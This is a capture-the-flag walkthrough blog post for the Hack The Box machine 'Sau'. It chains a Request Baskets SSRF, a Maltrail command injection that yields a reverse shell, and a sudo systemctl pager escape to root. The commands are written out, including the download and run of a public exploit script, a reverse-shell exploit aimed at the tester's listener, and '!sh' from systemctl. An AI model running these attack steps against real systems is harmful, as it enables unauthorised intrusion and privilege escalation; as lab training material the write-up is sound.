banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

htb Target Sau

#htb#靶场15
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document describes a penetration testing scenario involving a Linux machine named "Sau" with an IP address of 10.10.11.224. The machine has a simple difficulty level and runs an instance of "Request Baskets" that is vulnerable to a server-side request forgery (SSRF) exploit identified as CVE-2023-27163. By exploiting this vulnerability, the tester can access an instance of "Maltrail" that has an unauthorized command injection vulnerability, allowing them to obtain a reverse shell as the "puma" user. The tasks outlined include identifying open TCP ports, determining the software version of "Request Baskets," finding the CVE number for the SSRF vulnerability, and exploiting an unauthenticated command injection vulnerability in Maltrail. The tester uses various scripts and commands to gain access and escalate privileges to root by exploiting a vulnerability in the installed version of systemd, identified as CVE-2023-26604. The document concludes with the retrieval of flags for both the user and root.

htb-Sau(study)#

Target machine IP: 10.10.11.224

About Sau

“Sau” is a simple difficulty Linux machine, which has a “Request Baskets” instance that is vulnerable to a server-side request forgery (SSRF) issue that can be exploited through CVE-2023-27163. By exploiting this vulnerability, we can access a “Maltrail” instance that has an unauthorized operating system command injection vulnerability, allowing us to obtain a reverse shell on that machine as the “puma” user. Subsequently, by exploiting the misconfiguration of “sudo,” we can obtain a “root” shell.

task1 What is the highest TCP port open on the target machine?

55555

nmap -sT 10.10.11.224

79568d8cd8fb4e8c6dac72c92c1f4880_MD5

task2 What open-source software supports the application on port 55555?

nmap -p55555 -sV 10.10.11.224

Access the application on 55555

http://10.10.11.224:55555/web

9f22418a2954895d926d9f2e5cea27d4_MD5

request-baskets

task3 What version of request-baskets is running on Sau?

From the screenshot of task2, we can see that the current version of request-baskets is 1.2.1

task4 What is the CVE number for the SSRF vulnerability in request-baskets?

You can find it by searching the application name along with the version number on Google.

f6e31aa14f48f8dbe5bc05d52be73f6d_MD5

CVE-2023-27163

task5 What software supports the application running on port 80?

Here, we need to access the internal network's port 80 through the SSRF vulnerability, as nmap scanning its port is not accessible.

43ad9ee5c658ae3511e2c61c997aeef8_MD5

Reference: https://sploitus.com/exploit?id=6BAA524E-16EA-562C-804B-113B8244C6EA, this script can proxy traffic to port 80.

wget https://raw.githubusercontent.com/Rubioo02/CVE-2023-27163/main/CVE-2023-27163.sh
chmod +x CVE-2023-27163.sh
./CVE-2023-27163.sh -t <TARGET_URL> -a <ATTACKER_URL>

d05962feb570d9a9383238e4345ba837_MD5

Access the given link: http://10.10.11.224:55555/vxctgy, as shown in the image, we can see the Maltrail application.

f37a23ed9cefdad4c85afc7783436003_MD5

36f6bb711a27819dd26a930cc01873da_MD5

task6 There is an unauthenticated command injection vulnerability in MailTrail v0.53. Find the path to exploit it.

Powered by Maltrail (v0.53)

Attempt directory traversal.

d13cdd3e6bfc60ef94e11ca892374a4e_MD5

Attempt to submit, and find it is /login. Checking the poc also reveals: https://github.com/josephberger/Maltrail-v0.53-RCE/blob/main/exploit.py

task7 On Sau, under what system user does the Mailtrack application run?

Using the script from https://github.com/josephberger/Maltrail-v0.53-RCE/blob/main/exploit.py for RCE.

python3 exploit.py 10.10.14.10 1234 http://10.10.11.224:55555/vxctgy

nc listening:

ca753a518ea64d5d5374fb59f10e5945_MD5

That is the puma user.

Submit the user’s flag.

fc03d8c1ea7e0ae81e6e553c43fddcc4_MD5

task9 What is the full path of the binary file running as root by the puma user on Sau (without parameters)?

/usr/bin/systemctl

da6d582355a72d142df61a2e3b8f7f2c_MD5

task10 What is the full version string of the systemd instance installed on Sau?

9553d660ae49333de57377329a3aeae6_MD5

systemd 245 (245.4-4ubuntu3.22)

task11 This version of systemd has a CVE vulnerability that can escalate privileges, what is the CVE number?

CVE-2023-26604

Reference: https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7

Submit the root’s flag.

sudo /usr/bin/systemctl status trail.service

!sh

54985a96b339fc4efa97f80c2ad8b337_MD5

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.